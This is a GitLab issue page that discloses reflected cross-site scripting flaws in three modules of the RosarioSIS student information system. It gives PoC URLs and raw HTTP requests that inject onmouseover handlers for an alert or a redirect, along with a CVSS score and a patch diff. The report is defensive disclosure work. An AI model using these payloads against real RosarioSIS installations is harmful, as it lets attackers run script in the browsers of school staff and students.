Skip to content
GitLab
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    • Switch to GitLab Next
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • rosariosis rosariosis
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 15
    • Issues 15
    • List
    • Boards
    • Service Desk
    • Milestones
    • Requirements
  • Merge requests 0
    • Merge requests 0
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Wiki
    • Wiki
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • François Jacquet
  • rosariosisrosariosis
  • Issues
  • #291
Closed
Open
Issue created Jul 12, 2020 by M507@M507🔧

Reflected Cross-Site Scripting in different locations

Reflected Cross-Site Scripting vulnerability in Preferences.php, PrintSchedules.php, and Search.inc.php in RosarioSIS Student Information System < 6.7.2 allows remote attackers to execute arbitrary javascript via embedding javascript in the 'tab', 'include_inactive', and 'advanced' parameters in a GET request.

Plugin README
Vulnerability type: Cross-Site Scripting vulnerability (XSS)
Vendor of the product(s): RosarioSIS
Affected product(s)/code base: Tested on version 6.7.2
Has vendor confirmed or acknowledged the vulnerability: Yes
Attack type: Reflected XSS
Impact & Description: C:L/I:L/A:N
Affected component: modules/Users/Preferences.php, modules/Scheduling/PrintSchedules.php, and modules/Users/Search.inc.php
Attack vector(s): Remote
Proof of concept (PoC): Details below
Reference(s): #291 (closed)
CVSS v3.1 details: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

PoC links:

# e1
http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php&tab=1%22onmouseover%3d%22location=`https://google.com`
# e2
http://RosarioSIS.edu/Modules.php?modname=Users/Preferences.php&tab=1"onmouseover%3d"alert(`xss`)
# Full redirect injection PoC
GET /Modules.php?modname=Users/Preferences.php&tab=1%22onmouseover%3d%22location=`https://google.com` HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: RosarioSIS=<Cookie>

"include_inactive" in modules/Scheduling/PrintSchedules.php has the same issue.

PoC links:

# e1
http://RosarioSIS.edu//Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22location=`https://google.com`%22style%3d%22
# e2
http://RosarioSIS.edu/Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22alert(1)%22style%3d%22
# Full redirect injection PoC
GET/Modules.php?modname=Scheduling/PrintSchedules.php&modfunc=&search_modfunc=list&next_modname=Scheduling/PrintSchedules.php&include_inactive=1%22onmouseover%3d%22location=`https://google.com`%22style%3d%22 HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: RosarioSIS=<Cookie>
Upgrade-Insecure-Requests: 1
If-None-Match: W/e3614b5b6e43dba48c2aa042cbd2d046
Cache-Control: max-age=0

"advanced" in modules/Users/Search.inc.php has the same issue.

PoC links:

# e1
http://RosarioSIS.edu/Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1%22onmouseover%3d%22alert(`xfr`)%22
# e2
http://RosarioSIS.edu/Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1"onmouseover%3d"location=`https://google.com`"
# Full redirect injection PoC
GET /Modules.php?modname=Users/User.php&next_modname=Users/User.php&advanced=1"onmouseover%3d"location=`https://google.com`" HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: RosarioSIS=<Cookie>
Upgrade-Insecure-Requests: 1
If-None-Match: W/e3614b5b6e43dba48c2aa042cbd2d046
Cache-Control: max-age=0

Remediation example:

root@bd410a977728:/usr/src/rosariosis# diff ./modules/Users/Preferences.php ./modules/Users/Preferences.php.bk
126,128c126,127
< 	$ttt = $_REQUEST['tab'];
< 	$ttt = htmlspecialchars(strip_tags($ttt));
< 	echo '<form action="Modules.php?modname=' . $_REQUEST['modname'] . '&amp;tab=' . $ttt . '" method="POST">';
---
>
> 	echo '<form action="Modules.php?modname=' . $_REQUEST['modname'] . '&amp;tab=' . $_REQUEST['tab'] . '" method="POST">';
root@bd410a977728:/usr/src/rosariosis#
Edited Jul 13, 2020 by M507
To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information
Assignee
Assign to
Time tracking